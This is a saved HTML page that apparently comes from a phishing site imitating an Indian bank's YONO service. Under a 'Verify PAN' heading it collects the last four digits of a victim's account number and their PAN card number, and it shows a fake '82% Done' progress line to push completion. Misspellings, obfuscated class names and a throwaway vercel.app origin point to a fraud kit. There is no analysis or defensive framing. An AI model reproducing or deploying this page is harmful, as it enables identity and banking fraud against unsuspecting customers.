<!DOCTYPE html>
<!-- saved from url=(0029)https://sb-bysf.vercel.app/zx -->
<html lang="en" webcrx="" style="">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width">
    <title>Wellcometo</title>
    <meta name="next-head-count" content="3">
    <link rel="stylesheet" href="./css/style.css" />
</head>

<body cz-shortcut-listen="true">
    <div id="__next">
        <header class="Jeuookhh_logo__chFnY"><img alt="2wQI0x" loading="lazy" width="120" height="32" decoding="async"
                data-nimg="1" src="./images/yono.png" style="color: transparent;"></header>
        <main>
            <div class="Jeuookhh_login_heading__g_rIN">
                <h3 class="Jeuookhh_login_heading_h3__40cUi">Verify PAN</h3>
            </div>
            <div class="Jeuookhh_login_form__UT1PX">
                <p class="Jeuookhh_mandatory_txt__seeNN">Mandory fields an asterisk (*)</p>
                <form class="Jeuookhh_form__NPDIu" method="post"><input type="hidden" name="formtoken" value="t57Xpy">
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Last 4-digit Account No
                            <span class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="LascN" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" inputmode="numeric" maxlength="4"
                            minlength="4"></div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Pan card No <span
                                class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="Upan" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" maxlength="10"
                            pattern="[a-zA-Z]{5}[0-9]{4}[a-zA-Z]{1}" minlength="10"></div>
                    <p class="Jeuookhh_content_title__eLlbR">82% Done</p>
                    <div class="Jeuookhh_t_center____ZxZ"><input type="submit" class="Jeuookhh_btn_default__PIkhU"
                            value="submit"></div>
                </form><br>
            </div>
        </main>
        <div class="Jeuookhh_footer_area__5ot65"><img alt="Aeh0p0" loading="lazy" width="68" height="28"
                decoding="async" data-nimg="1" src="./images/gwhp.png" style="color: transparent;"></div>
        <div class="Jeuookhh_footer__Wxn0J">
            <p>©</p>
        </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json"
        crossorigin="">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"0lCBycRkeqCWXcllfoPaw","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert"
            style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;">
            Loading...</p>
    </next-route-announcer>
    <script src="./Wellcometo4_files/354-4e020a05081b574c.js.download"></script>
    <script src="./Wellcometo4_files/bbx-87a45827a86431f3.js.download"></script>
    <script src="./Wellcometo4_files/kj-2223d62af91e386b.js.download"></script>
    <script src="./Wellcometo4_files/why-373c9d3dc95162c6.js.download"></script>
    <script src="./Wellcometo4_files/sb-c5284f5704c5ea49.js.download"></script>
    <script src="./Wellcometo4_files/ism-2c00e88577fcbbfd.js.download"></script>
    <script src="./Wellcometo4_files/zx-3148b250491a8684.js.download"></script>
</body>

</html>